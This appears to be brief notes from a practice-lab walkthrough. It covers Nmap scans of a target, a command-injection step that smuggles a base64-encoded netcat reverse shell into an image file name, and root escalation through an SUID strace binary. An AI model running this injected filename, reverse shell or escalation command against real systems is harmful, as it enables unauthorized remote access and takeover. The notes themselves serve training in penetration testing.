Date
Mar 23, 2025 → Mar 23, 2025
Tag
Nmap
Privilege Escalation Techniques
Web Exploitation
192.168.140.178
Nmap
└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 05:57 EDT
Nmap scan report for 192.168.140.178
Host is up (0.070s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 14.37 seconds
└─# nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-23 05:57 EDT
Warning: 192.168.140.178 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.140.178
Host is up (0.066s latency).
All 65535 scanned ports on 192.168.140.178 are in ignored states.
Not shown: 65385 open|filtered udp ports (no-response), 150 closed udp ports (port-unreach)
Nmap done: 1 IP address (1 host up) scanned in 144.92 seconds
80


nothing found via brute force

we found a script could be used
but it is a metasploit, so we need to know how this vulnerability works via below link
simple to say, we need to name an image which include | and it will run the command after |
cp pngegg.png '|abc"echo YnVzeWJveCBuYyAxOTIuMTY4LjQ1LjE3NSA0NDQ0IC1lIC9iaW4vYmFzaA== | base64 -d | bash".jpg'


into that machine
PE
we need to check strace binary to see if any SUID bit in it.
use
ls -alh /usr/bin/strace

strace -o /dev/null /bin/sh -p

got it